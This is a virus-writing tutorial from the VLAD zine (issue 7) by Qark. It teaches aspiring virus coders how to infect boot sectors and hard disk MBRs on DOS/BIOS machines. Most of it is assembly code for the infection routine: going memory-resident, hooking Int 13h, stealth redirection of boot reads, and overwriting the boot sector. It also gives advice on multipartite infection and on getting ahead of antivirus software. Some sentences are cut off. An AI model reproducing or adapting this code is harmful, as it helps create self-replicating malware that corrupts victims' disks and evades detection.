Virus Labs & Distribution
VLAD #7 - Boot Sector Tutorial

                        Boot Sector Infection                 
                              by Qark

 A lot of coders have difficulty taking the step from file infection to
 boot sector infection.  The prospective coder is always scared of writing
 to the harddisk with a direct Int 13h and confused by the technical

 There isn't much to know about boot sector infection really, and
 it's actually easier than com infection once you know how to do it.

 I'll demonstrate how to do infection later on but first there is some basic
 technical information that is important to know:

   On bootup Int 19h loads the boot sector into memory at 0:7C00h and
   executes it at that position.  On entry to the code all registers are
   set to any value (including SS:SP) except DL which points to the drive
   being booted off (this is due to int 19h which needs a drive number when
   it gets called).  Only BIOS interrupts may be called by the bootsector so
   that gives you the vectors from 0-1F and some more obscure ones such as
   int 76h.  The standard stack used by any boot sectors is 0:7C00 and you
   should set your SS:SP to this on entry.
   Much useful data is located in the BIOS data segment, segment 40h. Because
   of segmentation, it is convenient to address the data in the form
   0000:04xx so that the interrupt table and code segment may addressed at
   the same time.  The most important data in segment 40h for the virus
   writer is the BIOS memory size located at 0:413h (40:13).  It indicates
   the amount of conventional memory available on the computer in 1K (1024) 
   units.  Interrupt 12h returns the value of this word in AX.
   All boot sectors, including DOS partitions, contain a 55AA marker as the
   last word in the sector at offset 510 (1FEh).  It is necessary that this
   is present if the sector is to be executed.

   The hard disk MBR is located at sector 1, track 0, head 0 of drive C
   (80h).  At offset 1BEh of the MBR is the partition table which is 64 bytes
   long. When the virus is written to the harddisk MBR, it is important that
   these 64 bytes are maintained in their position, or else the computer
   can't be accessed if booting 'clean' from the disk drive.  Apart from the
   first sector, which is used by the MBR, all of track 0 is free space to be
   used by a virus as it wants.  Most boot sector viruses use this room, and
   there is all the space a virus will require, as most harddisks have at
   least a minimum of 16 sectors per track.  When the MBR executes it scans
   the partition table for a bootable partition, it loads this sector in, and
   executes it.  Thus it is possible to also infect the computers' DOS
   partition boot sector, which would be done using the same method as a
   floppy boot sector.

 Basic Overview:

        Set SS:SP to 0:7C00h
        Lower BIOS memory allocation
        Write virus into the free space in memory
        Set int 13h to the virus int 13h handler
        Call int 19h to exit

 Int13handler Overview:

        If it's not a read to the sector 1, head 0, track 0 then ignore.
        Call the read.
        If the buffer doesn't have the virus code then infect.
        To stealth, read the original bootsector into buffer.

 Infection Overview:

        Write original boot sector elsewhere on the disk.
        Write virus to the boot sector.

 In detail

 Set SS:SP to 0:7C00 :
                cli             ;disable interrupts
                xor ax,ax
                mov ss,ax
                mov sp,7c00h
                sti             ;enable interrupts
 Lower BIOS memory allocation:
                dec word ptr [413h]    ;Memory less by 1K

 Write virus into the free space in memory:
                int 12h         ;memory into AX
                mov cl,6        ;because memory is in K
                shl ax,cl
                mov es,ax       ;ES is the virus segment
                mov cx,512      ;assume DS:SI points to virus start
                rep movsb       ;move virus into its memory

 Set int 13h to the virus int 13h handler:
                mov si,13h*4
                mov di,offset int13storage
                mov word ptr [si-4],offset int13handler
                mov word ptr [si-2],es

 Call int 19h to exit:
                int 19h         ;Will try to reload the virus sector, but
                                ;stealth will redirect it to the original
                                ;boot sector.

 If it's not a read to the sector 1, head 0, track 0 then ignore:
                cmp ah,2        ;read ?
                jne exit_int13
                cmp cx,1        ;sector 1, track 0 ?
                jne exit_int13
                or  dh,dh       ;head 0 ?
                jnz exit_int13

 Call the read:
                call dword ptr cs:int13storage

 If the buffer doesn't have the virus code then infect:
                cmp word ptr es:[bx+offset marker],MarkerBytes
                je  stealth_the_buffer_instead
                ;infection code follows...

 To stealth, read the original bootsector into buffer.
                mov cx,2                ;stored original BS at sector 2
                mov ax,201h
                call orig_int13h

 Write original boot sector elsewhere on the disk:
                mov ax,301h
                mov cx,2                ;store orig BS at sector 2
                call orig_int13h

 Write virus to the boot sector:

                xor bx,bx               ;virus code is at offset 0
                push cs
                pop es
                mov cx,1
                mov ax,301h
                call orig_int13h

 In the code examples I have completely ignored floppy disk infection, but
 good places to store the original boot sector on a disk are at the end of
 the root directory (like stoned does) or reduce the size of the track
 entry in the bootsector information, and place the virus in there.
 Comparison between floppy/HD will often be necessary due to their different


 Multipartitism is where the virus not only infects boot sectors, but also
 does COM, EXE or SYS files.  The hardest part of doing this is intercepting
 the Int 21h vector.  If you hook too early the system will crash or not
 be infected at all.  Too late and AV software will get in first and avoid
 any stealth.

  The most common method is continuous checking of the start of the read
  buffer for an 'MZ' because this will indicate the loading of an EXE file.
  The computer will hang for anyone using QEMM (DOSDATA.SYS).

  Hooking Int 10h and waiting for some call, such as a clear screen which
  indicates program loading.

  Using a counter, and grabbing int 21h after a period of time has elapsed.

  Checking to see if an interrupt vector changes/points to a certain segment.
  This won't work with QEMM (DOSDATA.SYS) either.

 Grabbing Int 21h from a boot sector virus is difficult, and often
 incompatible, but some viruses like junkie have been highly successful doing



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